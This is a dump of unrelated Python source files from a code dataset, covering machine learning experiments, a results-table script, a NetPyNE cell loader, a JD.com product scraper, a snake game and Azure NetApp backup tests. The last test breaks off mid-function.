self.last_state_test = self.mem_test.get_recent_state()\n if self.mode == 'cv':\n self.mem_cv.add(o, a, r, term)\n self.last_state_cv = self.mem_cv.get_recent_state()\n\n def observe_first(self, o):\n o = o.flatten()\n # get the first observation in an episode\n if self.mode == 'learn':\n for i in range(self.hist_len):\n self.mem.add(o, 0, 0.0, False)\n self.last_state = self.mem.get_recent_state()\n if self.mode == 'test':\n for i in range(self.hist_len): # copy the same observation for the first state\n self.mem_test.add(o, 0, 0.0, False)\n self.last_state_test = self.mem_test.get_recent_state()\n if self.mode == 'cv':\n for i in range(self.hist_len):\n self.mem_cv.add(o, 0, 0.0, False)\n self.last_state_cv = self.mem_cv.get_recent_state()\n\n def get_cv_info(self, batch_size):\n s, s2, a, r, term = self.mem_cv.sample_batch(batch_size)\n q = self.network.get_q_output(self.session, s)\n targets = self.get_q_targets(r, s2, term)\n a = self.actions_to_one_hot(a)\n info = {}\n info['avg_q'] = np.mean(q, axis=0)\n info['max_q'] = np.amax(q)\n info['min_q'] = np.amin(q)\n info['min_t'] = np.amin(targets)\n info['max_t'] = np.amax(targets)\n info['min_r'] = np.amin(r)\n info['max_r'] = np.amax(r)\n info['term_num'] = np.sum(term)\n info['avg_a'] = np.mean(self.actions_to_one_hot(np.argmax(q, axis=1)), axis=0)\n info['cv_loss'] = self.network.get_loss(self.session, s, a, targets)\n return info\n\n def get_info(self, batch_size):\n info = self.get_cv_info(batch_size)\n info['step'] = self.step_num\n info['epsilon'] = self.ep\n info['weight_norm'] = self.network.get_weight_norm(self.session)\n return info\n\n def save_model(self, file_name):\n self.network.save_model(self.session, file_name)\n\n def load_model(self, file_name):\n self.network.load_model(self.session, file_name)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"base_agent.py","file_name":"base_agent.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305324101","text":"from matplotlib.pyplot import title\nfrom util import *\nfrom rbm import RestrictedBoltzmannMachine\nfrom dbn import DeepBeliefNet\n\nif __name__ == \"__main__\":\n\n image_size = [28, 28]\n train_imgs, train_lbls, test_imgs, test_lbls = read_mnist(\n dim=image_size, n_train=60000, n_test=10000)\n\n # ''' restricted boltzmann machine '''\n\n # print(\"\\nStarting a Restricted Boltzmann Machine..\")\n\n # rbm = RestrictedBoltzmannMachine(ndim_visible=image_size[0]*image_size[1],\n # ndim_hidden=500,\n # is_bottom=True,\n # image_size=image_size,\n # is_top=False,\n # n_labels=10,\n # batch_size=20\n # )\n\n # rbm.cd1(visible_trainset=train_imgs, n_iterations=18000)\n\n ''' deep- belief net '''\n\n print(\"\\nStarting a Deep Belief Net..\")\n\n dbn = DeepBeliefNet(sizes={\"vis\": image_size[0]*image_size[1], \"hid\": 500, \"pen\": 500, \"top\": 2000, \"lbl\": 10},\n image_size=image_size,\n n_labels=10,\n batch_size=20\n )\n\n ''' greedy layer-wise training '''\n\n dbn.train_greedylayerwise(vis_trainset=train_imgs,\n lbl_trainset=train_lbls, n_iterations=90000)\n\n # dbn.recognize(train_imgs[:1000, :], train_lbls[:1000, :])\n\n # dbn.recognize(test_imgs, test_lbls)\n \n\n imgs = []\n for digit in range(10):\n digit_1hot = np.zeros(shape=(1, 10))\n digit_1hot[0, digit] = 1\n imgs.append(dbn.generate(digit_1hot, name=\"rbms\", init_random_pen=True))\n plot_generated(np.array(imgs), np.array([i for i in range(10)]))\n\n imgs = []\n for digit in range(10):\n digit_1hot = np.zeros(shape=(1, 10))\n digit_1hot[0, digit] = 1\n imgs.append(dbn.generate(digit_1hot, name=\"rbms\", init_random_pen=False))\n plot_generated(np.array(imgs), np.array([i for i in range(10)]), dirname='rand_img')\n\n # ''' fine-tune wake-sleep training '''\n\n # dbn.train_wakesleep_finetune(\n # vis_trainset=train_imgs, lbl_trainset=train_lbls, n_iterations=10000)\n\n # dbn.recognize(train_imgs, train_lbls)\n\n # dbn.recognize(test_imgs, test_lbls)\n\n # for digit in range(10):\n # digit_1hot = np.zeros(shape=(1, 10))\n # digit_1hot[0, digit] = 1\n # dbn.generate(digit_1hot, name=\"dbn\")\n","sub_path":"lab4/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"429032550","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport glob\nimport seaborn as sns\nimport matplotlib\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef transform_model(row):\n if row['method'] == 'DM':\n return row['ml']\n elif row['method'] == 'IPW':\n return row['prop_pred']\n else:\n return f'{row[\"prop_pred\"]}, {row[\"ml\"]}'\n\ndf = pd.DataFrame()\n \n# our method\ndf_buffer = pd.read_csv(f'../results/synthetic/compiled/our_method.csv')\ndf_buffer['method'] = df_buffer['method'].map({'Direct': 'DM', 'Robust': 'DR', 'IPW': 'IPW'})\ndf_buffer = df_buffer[((df_buffer['budget'].isna()) | (df_buffer['budget'] == 1.0)) & (df_buffer['depth'] == 1)]\n# print(df_buffer['ml'].value_counts())\n# dm = df_buffer[(df_buffer['method'] == 'DM') & (df_buffer['ml'] == 'linear')]\n# dr = df_buffer[(df_buffer['method'] == 'DR') & ((df_buffer['ml'] == 'linear') & (df_buffer['prop_pred'] == 'tree'))]\n# ipw = df_buffer[(df_buffer['method'] == 'IPW') & (df_buffer['prop_pred'] == 'tree')]\n\ndf_buffer['prop_pred'] = df_buffer['prop_pred'].map({'tree': 'DT', 'log': 'Log'})\ndf_buffer['ml'] = df_buffer['ml'].map({'linear': 'LR', 'lasso': 'Lasso'})\n\ndef transform_model(row):\n if row['method'] == 'DM':\n return row['ml']\n elif row['method'] == 'IPW':\n return row['prop_pred']\n else:\n return f'{row[\"prop_pred\"]}, {row[\"ml\"]}'\n \ndf_buffer['model'] = df_buffer.apply(lambda row: transform_model(row), axis=1)\n\n# df_buffer = pd.concat([ipw, dm, dr], ignore_index=True)\n\ndf = pd.concat([df, df_buffer[['depth', 'method', 'model', 'gap', \n 'solve_time', 'regret_test', 'best_found_test']]], ignore_index=True)\n\n\n# K-PT/B-PT\ndf_buffer = pd.read_csv(f'../results/synthetic/compiled/KB.csv')\ndf_buffer['method'] = df_buffer['method'].map({'Kallus': 'K-PT', 'Bertsimas': 'B-PT'})\ndf_buffer = df_buffer[df_buffer['depth'] == 1]\ndf_buffer['model'] = '-'\ndf = pd.concat([df, df_buffer[['depth', 'method', 'model', 'gap', \n 'solve_time', 'regret_test', 'best_found_test']]], ignore_index=True)\n\n# policytree\ndf_buffer = pd.read_csv(f'../results/synthetic/compiled/policytree/raw.csv')\nfor col, oosp, regret in zip([f'time_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'p{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'oosr_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']]):\n h = pd.DataFrame({'solve_time': df_buffer[col].tolist(),\n 'regret_test': df_buffer[regret].tolist(),\n 'best_found_test': df_buffer[oosp].tolist()})\n h['method'] = 'PT'\n h['best_found_test'] *= 100\n h['gap'] = 0\n h['depth'] = 1\n h['model'] = 'DT, LR'\n df = pd.concat([df, h], ignore_index=False)\n \n \n# CF, CT\nfor m, m_name in zip(['cf', 'ct'], ['CF', 'CT']):\n df_buffer = pd.read_csv(f'../results/synthetic/compiled/CF/{m}_raw.csv')\n# df_trans = pd.DataFrame(columns=['method', 'randomization', 'realized_outcome_oos'])\n for col, oosp, regret in zip([f'time_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'p{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'oosr_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']]):\n h = pd.DataFrame({'solve_time': df_buffer[col].tolist(),\n 'regret_test': df_buffer[regret].tolist(),\n 'best_found_test': df_buffer[oosp].tolist()})\n h['method'] = m_name\n h['gap'] = 0\n h['best_found_test'] *= 100\n h['depth'] = '-'\n h['model'] = '-'\n df = pd.concat([df, h], ignore_index=False)\n \n \n# RC\nfp = '../results/synthetic/compiled/RC'\ndf_buffer = pd.read_csv(os.path.join(fp, 'raw.csv'))\ndf_buffer = df_buffer[df_buffer['method'] == 'lr']\ndf_buffer['method'] = 'R&C'\ndf_buffer = df_buffer.rename(columns={'time_elapsed': 'solve_time', 'oosp': 'best_found_test',\n 'oos_regret': 'regret_test'})\ndf_buffer['gap'] = 0\ndf_buffer['depth'] = '-'\ndf_buffer['model'] = 'LR'\ndf_buffer['best_found_test'] *= 100\ndf = pd.concat([df, df_buffer[['depth', 'method', 'model', 'gap', \n 'solve_time', 'regret_test', 'best_found_test']]], ignore_index=False)\n\n\nmean_df = df.groupby(['depth', 'method', 'model']).agg('mean').reset_index().round(2)\nstd_df = df.groupby(['depth', 'method', 'model']).agg('std').reset_index().round(2)\n\ncombined = mean_df.merge(std_df, on=['depth', 'method', 'model'])\nfor col in ['gap', 'solve_time', 'regret_test', 'best_found_test']:\n combined[col] = combined.apply(lambda row: f'{row[f\"{col}_x\"]:.2f} ± {row[f\"{col}_y\"]:.2f}', axis=1)\n combined = combined.drop(columns=[f'{col}_{i}' for i in ['x', 'y']])\n\nmapping = {'IPW': 1, 'DM': 2, 'DR': 3, 'K-PT': 4, 'B-PT': 5, 'PT': 6, 'CF': 0, 'R&C': 0, 'CT': 0}\n\ncombined['method_map'] = combined['method'].apply(lambda x: mapping[x])\n\nprint(combined.sort_values(by=['depth', 'method_map']).drop(columns=['method_map']).to_latex(index=False))","sub_path":"analysis_viz/appendix_table2.py","file_name":"appendix_table2.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"153058559","text":"import logging\nimport os\n\nfrom neuron import h\nfrom netpyne import specs, conversion\n\n\ndef init_cells(net_params: specs.NetParams, cells):\n all_cells = load_many_cells(cells, net_params)\n\n\ndef load_hoc_files(load_biophysics=True):\n \"\"\"\n Check the h.load_file documentation. number one flag is required to force NEURON to load the file with the same\n name again.\n https://www.neuron.yale.edu/neuron/static/py_doc/programming/dynamiccode.html?highlight=load_file#load_file\n \"\"\"\n\n # Load import3d, this is required for the cell morphologies\n h.load_file(\"import3d.hoc\")\n # Load constants, not sure if this is needed, but better safe than sorry\n h.load_file(\"constants.hoc\")\n\n # Load morphology. Every cell has its own morphology\n h.load_file(1, \"morphology.hoc\")\n # Load biophysics. Every cell types has its own biophysic\n # if clause to prevent error output of trying to load same template multiple times\n if load_biophysics:\n h.load_file(1, \"biophysics.hoc\")\n # Load synapses. Needed for synmechs\n h.load_file(1, \"synapses/synapses.hoc\")\n\n\ndef load_cell(label: str, cell_name: str, net_params: specs.NetParams, load_path=None, load_biophysic=True) -> dict:\n\n # Set current workdir temporarily to this cells directory so hoc files load properly\n # (For some reason full paths break loading of cells sometimes)\n original_path = os.getcwd()\n if load_path is None:\n os.chdir(os.path.join(original_path, \"cells\", label))\n template_path = str(os.path.join(original_path, \"cells\", label, \"template.hoc\"))\n else:\n os.chdir(os.path.join(load_path, label))\n template_path = str(os.path.join(load_path, label, \"template.hoc\"))\n\n net_params.popParams.keys()\n\n # Import cell files\n load_hoc_files(load_biophysic)\n\n # This functions imports the cells. Does not work if cells have\n cell_rule = net_params.importCellParams(\n label=label,\n fileName=template_path,\n cellName=cell_name,\n cellArgs=[1], # Load synapses: 0 = false, 1=true. Need to be true to import synapse mechanisms\n importSynMechs=True,\n )\n # Set workdir back to original\n os.chdir(original_path)\n return cell_rule\n\n\ndef load_many_cells(cells, net_params: specs.NetParams) -> list[dict]:\n all_cells = []\n for i, cell in enumerate(cells):\n logging.info(\"Loading cell num {}\".format(i))\n cell_type_labels = list(map(lambda x: x[:-2], net_params.cellParams.keys()))\n\n load_biophysics = cell[\"label\"][:-2] not in cell_type_labels\n\n c = load_cell(label=cell[\"label\"], cell_name=cell[\"cell_name\"],\n net_params=net_params,\n load_biophysic=load_biophysics)\n all_cells.append(c)\n logging.debug(net_params.cellParams.keys())\n return all_cells\n","sub_path":"netpyne/config/cell_config.py","file_name":"cell_config.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623009782","text":"# coding:iso-8859-9\r\n# p_13806a.py: @staticmethod'la kopya sınıf nesnelerin değişen tip özelliklerinin aktarılamaması örneği.\r\n\r\nclass Evciller:\r\n ad = \"evcil hayvanlar\"\r\n @staticmethod\r\n def hakkında(): print (\"Bu sınıf {} hakkındadır!\" .format (Evciller.ad) ) \r\n\r\nclass Köpekler (Evciller): ad = \"insanların en sadık arkadaşı olan köpekler\"\r\nclass Kediler (Evciller): ad = \"insanın ayakları dibinden ayrılmayan kediler\"\r\nclass Kuşlar (Evciller): ad = \"insanın omuzlarında şakıyan muhabbet kuşları\"\r\n\r\ne = Evciller()\r\ne.hakkında()\r\n\r\nkö = Köpekler()\r\nkö.hakkında()\r\n\r\nke = Kediler()\r\nke.hakkında()\r\n\r\nku = Kuşlar()\r\nku.hakkında()\r\n\r\n\"\"\"Çıktı:\r\n>python p_13806a.py\r\nBu sınıf evcil hayvanlar hakkındadır!\r\nBu sınıf evcil hayvanlar hakkındadır!\r\nBu sınıf evcil hayvanlar hakkındadır!\r\nBu sınıf evcil hayvanlar hakkındadır!\r\n\"\"\"","sub_path":"Bernd Klein (520) ile Python/p_13806a.py","file_name":"p_13806a.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525468552","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport pyloco\n\nfrom .error import FreError\nfrom .app import AppBuildAnalyzer\nfrom .control import FrelptController\n\nclass FrelptTask(pyloco.Task):\n\n _name_ = \"frelpt\"\n _version_ = \"0.1.1\"\n\n def __init__(self, parent):\n\n self.add_data_argument(\"target\", help=\"filepath to the source file having 'pushdown' frelpt directive\")\n self.add_data_argument(\"build\", help=\"Linux command to compile a target application\")\n self.add_data_argument(\"clean\", help=\"Linux command to clean a target application\")\n\n self.add_option_argument(\"-o\", \"--outdir\", default=os.getcwd(), help=\"output directory\")\n\n def perform(self, targs):\n\n retval = 0\n\n try:\n\n # check if target file exist\n if not os.path.isfile(targs.target):\n raise FreError(\"Failed target argument of '%s'\"%str(targs.target))\n\n parent = self.get_proxy()\n\n # run application build analyzer\n app_analyzer = AppBuildAnalyzer(parent)\n argv = [targs.build, targs.clean, \"--outdir\", targs.outdir]\n retval, _forward = app_analyzer.run(argv)\n\n # run frelpt controller\n ctrl = FrelptController(parent)\n argv = [targs.target , \"--outdir\", targs.outdir]\n retval, _ = ctrl.run(argv, forward=_forward)\n\n except FreError as err:\n raise\n\n except Exception as err:\n raise\n\n return retval\n","sub_path":"frelpt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96570313","text":"import os\nimport argparse\nimport ujson as json\n\nfrom mnt.clde.word_translation import WordTranslator\nfrom mnt.problems.cltc.data import CLTC_DATA\nfrom mnt.problems.cltc import dictionary\n\ndef main(args):\n with open(args.D) as f:\n D = json.load(f)\n D = dictionary.clean_key_list(D)\n D = dictionary.reverse_kv(D)\n wt = WordTranslator(D)\n cd = CLTC_DATA(args.base_dir)\n for dataset in [\"book\", \"dvd\", \"music\"]:\n for pos in [\"positive\", \"negative\"]:\n src_paths, src_filenames = cd.get_filenames(\n lang=\"fr\",\n dataset=dataset,\n ds_type=\"test\",\n positive=pos\n )\n trg_paths = [\n os.path.join(args.base_dir, \"fr2en\", dataset,\n \"test\", pos,\n src_filename) for src_filename in src_filenames\n ]\n assert len(src_paths) == len(trg_paths)\n for src_fn, trg_fn in zip(src_paths, trg_paths):\n with open(src_fn) as f1, open(trg_fn, \"w\") as f2:\n src_tokens = f1.read().strip().split(\" \")\n trg_tokens = wt.translate(src_tokens)\n f2.write(\" \".join(trg_tokens))\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--base_dir\", \n default=\"/Users/chizewen/res/cross_distill/data/amazon_review/\")\n parser.add_argument(\"--D\", \n default=\"/Users/chizewen/repo/My-NLP-Tools/mnt/clde/out/80K_cut8_.fr.1\")\n args = parser.parse_args()\n main(args)","sub_path":"deprecated/mnt/problems/cltc/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"366060879","text":"from sklearn.neural_network import MLPClassifier\nfrom sklearn.datasets import make_moons\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport mglearn\n\nsplitStr = \"\\n\" + \"=\" * 100 + \"\\n\"\n\nX, y = make_moons(n_samples = 100, noise = 0.25, random_state = 3)\nX_train, X_test, y_train, y_test = train_test_split(X, y, stratify = y, random_state = 42)\n\nmlp = MLPClassifier(solver = 'lbfgs', random_state = 0, hidden_layer_sizes = [4, 5], \n\tactivation = 'tanh', alpha = 0.0001).fit(X_train, y_train)\nmglearn.plots.plot_2d_separator(mlp, X_train, fill = True, alpha = 0.3)\nmglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)\nplt.xlabel(\"Feature 0\")\nplt.ylabel(\"Feature 1\")\nplt.show()\nprint(splitStr)\nprint(\"training set score: \", mlp.score(X_train, y_train))\nprint(\"test set score: \", mlp.score(X_test, y_test))\n\nfig, axes = plt.subplots(2, 4, figsize = (20, 8))\nfor axx, n_hidden_nodes in zip(axes, [10, 100]):\n\tfor ax, alpha, in zip(axx, [0.0001, 0.01, 0.1, 1]):\n\t\tmlp = MLPClassifier(solver = 'lbfgs', random_state = 0, \n\t\t\thidden_layer_sizes = [n_hidden_nodes, n_hidden_nodes], \n\t\t\talpha = alpha).fit(X_train, y_train)\n\n\t\tmglearn.plots.plot_2d_separator(mlp, X_train, fill = True, alpha = 0.3, ax = ax)\n\t\tmglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train, ax = ax)\n\t\tax.set_title(\"n_hidder = [{}, {}]\\nalpha = {:.4f}\".format(n_hidden_nodes, n_hidden_nodes, alpha))\n\t\tprint(splitStr)\n\t\tprint(\"training set score: \", mlp.score(X_train, y_train))\n\t\tprint(\"test set score: \", mlp.score(X_test, y_test))\nplt.show()\n","sub_path":"Chapter2/tuanhtran/neuralNetwork_MLPClassifier_twoMoons.py","file_name":"neuralNetwork_MLPClassifier_twoMoons.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"102104912","text":"# -*- coding: utf-8 -*-\nfrom scrapy_redis.spiders import RedisSpider\nimport scrapy\nfrom urllib import parse\nimport re\nfrom JdSpider.items import JDItemLoader, JdspiderItem\nimport datetime\nfrom selenium import webdriver\nfrom JdSpider.settings import CHROME_DRIVER_PATH\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\n\n\nclass JdSpiderSpider(RedisSpider):\n name = 'jd_spider'\n redis_key = 'jd_spider:start_urls'\n allowed_domains = ['jd.com']\n\n def __init__(self, **kwargs):\n # 初始化selenium加载页面用的browser\n chrome_opt = webdriver.ChromeOptions()\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chrome_opt.add_experimental_option(\"prefs\", prefs)\n self.browser = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH, chrome_options=chrome_opt)\n # self.browser = webdriver.Chrome(executable_path=r\"E:\\Workspaces\\OldSpider\\JdSpider\\JdSpider\\driver\\chromedriver2_34.exe\", chrome_options=chrome_opt)\n super(JdSpiderSpider, self).__init__()\n dispatcher.connect(self.spider_close, signals.spider_closed)\n\n self.first = True\n self.yieldNum = 0\n self.yieldPNum = 0\n\n def spider_close(self):\n # 当爬虫退出的时候关闭chrome\n self.browser.close()\n\n def parse(self, response):\n \"\"\"\n 1. 提取出html页面中的所有url,并跟踪这些url进行异步爬取\n 2. 如果提取的url中格式为/item.jd.com/xxx 直接进入解析函数\n \"\"\"\n index_obj = re.match(\"(.*www.jd.com.*)\", response.url)\n if index_obj and self.first:\n self.first = False\n all_urls = response.css(\".cate_menu a::attr(href)\").extract()\n all_urls = [parse.urljoin(response.url, url) for url in all_urls]\n for url in all_urls:\n self.yieldNum += 1\n yield scrapy.Request(url)\n else:\n all_urls = response.css(\"a::attr(href)\").extract()\n all_urls = [parse.urljoin(response.url, url) for url in all_urls]\n new_urls = []\n for url in all_urls:\n m = re.match(\".*javascript.*\", url)\n if not m:\n new_urls.append(url)\n for url in new_urls:\n match_obj = re.match(\"(.*item.jd.com/(\\d+).html.*)\", url)\n if match_obj:\n # 如果提取到item相关的页面则下载后交由parse_item进行提取\n request_url = match_obj.group(1)\n item_id = match_obj.group(2)\n # 通过yield返回给scrapy的下载器,另外一定要用request\n self.yieldPNum += 1\n yield scrapy.Request(request_url, meta={\"item_id\": item_id}, callback=self.parse_item, priority=1)\n elif re.match(\"(.*list.jd.com/.*)\", url):\n if not re.match(\".*&ev=.*\", url):\n yield scrapy.Request(url)\n\n # 对单个网站测试\n # match_obj = re.match(\"(.*item.jd.com/(\\d+).html.*)\", response.url)\n # item_id = match_obj.group(2)\n # yield scrapy.Request(response.url, meta={\"item_id\": item_id}, callback=self.parse_item, priority=1)\n\n def parse_item(self, response):\n\n item_loader = JDItemLoader(item=JdspiderItem(), response=response)\n item_id = response.meta.get(\"item_id\", \"\")\n e = False\n if item_id:\n if (response.css(\".breadcrumb\")):\n # 图书类\n if not response.css(\".m-itemover\"):\n # 是否下架\n tag_list = self.get_book_tag_list(response=response)\n item_loader.add_value(\"item_id\", item_id)\n item_loader.add_css(\"name\", \"#name h1::text\")\n item_loader.add_value(\"summary\", self.get_summary(response=response)) # js加载\n item_loader.add_value(\"price\", self.get_a_price(response=response)) # js加载\n item_loader.add_value(\"tag_1\", tag_list[0])\n item_loader.add_value(\"tag_2\", tag_list[1])\n item_loader.add_value(\"tag_3\", tag_list[2])\n item_loader.add_value(\"tag_4\", tag_list[3])\n item_loader.add_value(\"dianpu_name\", self.get_book_dianpu_name(response=response))\n item_loader.add_value(\"jself\", self.get_jself(response=response))\n item_loader.add_value(\"crawl_time\", datetime.datetime.now())\n e = True\n elif(response.css(\"#crumb-wrap\")):\n # 非图书类,且没有被重定向到首页\n if not response.css(\".itemover\"):\n # 是否下架\n tag_list = self.get_tag_list(response=response)\n item_loader.add_value(\"item_id\", item_id)\n item_loader.add_css(\"name\", \".ellipsis::attr(title)\")\n item_loader.add_css(\"summary\", \".sku-name::text\")\n # item_loader.add_css(\"price\", \".summary-price-wrap .price::text\")\n item_loader.add_value(\"price\", self.get_b_price(response=response))\n item_loader.add_value(\"tag_1\", tag_list[0])\n item_loader.add_value(\"tag_2\", tag_list[1])\n item_loader.add_value(\"tag_3\", tag_list[2])\n item_loader.add_value(\"tag_4\", tag_list[3])\n item_loader.add_value(\"dianpu_name\", self.get_dianpu_name(response=response))\n item_loader.add_value(\"jself\", self.get_jself(response=response))\n item_loader.add_value(\"crawl_time\", datetime.datetime.now())\n e = True\n if e:\n jd_item = item_loader.load_item()\n print(\"return jd_item\")\n return jd_item\n\n def get_a_price(self, response):\n price = response.css(\"#jd-price::text\").extract()[0]\n if \"¥\" in price:\n price = price.replace(\"¥\", \"\")\n try:\n price = float(price)\n except:\n price = 0\n return price\n\n def get_b_price(self, response):\n itemId = response.meta.get(\"item_id\", \"\")\n price = response.css(\".J-p-{0}::text\".format(itemId)).extract()[0]\n if \"¥\" in price:\n price = price.replace(\"¥\", \"\")\n try:\n price = float(price)\n except:\n price = 0\n return price\n\n def get_book_dianpu_name(self, response):\n dianpu_name = response.xpath(\"//div[@class='seller-infor']/a/@title\").extract()\n if not dianpu_name:\n dianpu_name.append(\"京东自营\")\n return dianpu_name\n\n def get_dianpu_name(self, response):\n dianpu_name = response.xpath(\"//a[@clstag='shangpin|keycount|product|dianpuname1']/@title\").extract()\n if not dianpu_name:\n dianpu_name.append(\"京东自营\")\n return dianpu_name\n\n def get_jself(self, response):\n jself = response.css(\".u-jd\")\n if jself:\n return 1\n else:\n return 0\n\n def get_book_tag_list(self, response):\n tag_list = response.css(\".breadcrumb a::text\").extract()\n for i in range(4 - len(tag_list)):\n tag_list.append(\"...\")\n return tag_list\n\n def get_tag_list(self, response):\n tag_list = response.css(\"#crumb-wrap .crumb a::text\").extract()\n for i in range(4 - len(tag_list)):\n tag_list.append(\"...\")\n return tag_list\n\n def get_summary(self, response):\n summary = \"作者:\" + response.css(\"#p-author a::text\").extract_first(\"\") + \";\" \\\n + response.css(\"#p-ad::text\").extract_first(\"\")\n return summary\n\n\n","sub_path":"JdSpider/spiders/jd_spider.py","file_name":"jd_spider.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"374784616","text":"from graph import *\n\ncanvasSize(400, 400)\nbrushColor(0, 0, 255)\nrectangle(0,0,400,400)\n\nx=200\ny=50\na=10\nN=10\ndx=0\ndy=0\nsnake = []\npenColor(\"yellow\")\nbrushColor(\"yellow\")\nfor i in range(N):\n obj = rectangle(x+i*a, y, x+i*a+a, y+a)\n snake.append( obj )\n brushColor(\"green\")\n\ndef moveSnake(xNew, yNew):\n global x, y\n for k in range(len(snake)-1,0,-1):\n newCoord = coords(snake[k-1])\n moveObjectTo(snake[k], newCoord[0],\n newCoord[1])\n moveObjectTo(snake[0], xNew, yNew)\n x = xNew\n y = yNew\n\ndef keyPressed(event):\n global dx, dy\n if event.keycode == VK_LEFT:\n dx = -1\n dy = 0\n elif event.keycode == VK_RIGHT:\n dx = 1\n dy = 0\n elif event.keycode == VK_UP:\n dx = 0\n dy = -1\n elif event.keycode == VK_DOWN:\n dx = 0\n dy = 1\n elif event.keycode == VK_SPACE:\n dx = 0\n dy = 0\nonKey(keyPressed)\n\ndef update():\n if dx or dy:\n moveSnake( x + dx*a , y + dy*a )\nonTimer(update, 50)\nrun()","sub_path":"lab3/4.Кривая змейка.py","file_name":"4.Кривая змейка.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370287980","text":"#-*- coding:utf-8 -*-\n# author:29557\n# datetime:2018/9/7 11:31\n# software: PyCharm\n\nimport subprocess\n# cmd = 'start /b appium -a 127.0.0.1 -p 4444 --bootstrap-port 4445'\ncmd = 'adb devices'\na = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nb = a.communicate()\nprint(b)","sub_path":"src/xwp/SunmiRecovery/RecoveryApi.py","file_name":"RecoveryApi.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273669332","text":"from azure.mgmt.resource import ResourceManagementClient\nfrom devtools_testutils import AzureMgmtRecordedTestCase, recorded_by_proxy, set_bodiless_matcher\nfrom azure.mgmt.netapp.models import Backup\nfrom test_volume import delete_volume\nfrom test_backup import create_backup, disable_backup\nimport setup\nimport azure.mgmt.netapp.models\n\nclass TestNetAppAccountBackup(AzureMgmtRecordedTestCase):\n\n def setup_method(self, method):\n self.client = self.create_mgmt_client(azure.mgmt.netapp.NetAppManagementClient)\n print(\"Live status: {0}\".format(self.is_live))\n if self.is_live:\n print(\"Live global status: {0}\".format(setup.LIVE))\n setup.LIVE = True\n print(\"Live global status after set: {0}\".format(setup.LIVE))\n\n # Before tests are run live a resource group needs to be created along with vnet and subnet\n # Note that when tests are run in live mode it is best to run one test at a time.\n @recorded_by_proxy\n def test_list_account_backups(self):\n print(\"Starting test_list_account_backups\")\n set_bodiless_matcher()\n volumeName1 = self.get_resource_name(setup.TEST_VOL_1+\"-\")\n backup1 = self.get_resource_name(setup.TEST_BACKUP_1+\"-\")\n backup2 = self.get_resource_name(setup.TEST_BACKUP_2+\"-\")\n\n try:\n create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup1, backup_only=False)\n create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup2, backup_only=True)\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, account_name=setup.PERMA_ACCOUNT)\n backup_count = 0\n for backup in account_backup_list:\n if backup1 in backup.name or backup2 in backup.name:\n backup_count += 1\n\n assert backup_count == 2\n finally:\n disable_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup1)\n disable_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup2)\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, setup.PERMA_ACCOUNT)\n backup_count = 0\n for backup in account_backup_list:\n if backup1 in backup.name or backup2 in backup.name:\n backup_count += 1\n\n delete_volume(self.client, setup.TEST_RG, setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1)\n assert backup_count == 0\n \n print(\"Finished with test_list_account_backups\")\n\n @recorded_by_proxy\n def test_get_account_backups(self):\n print(\"Starting test_get_account_backups\")\n set_bodiless_matcher()\n volumeName1 = self.get_resource_name(setup.TEST_VOL_1+\"-\")\n backup1 = self.get_resource_name(setup.TEST_BACKUP_1+\"-\")\n try:\n 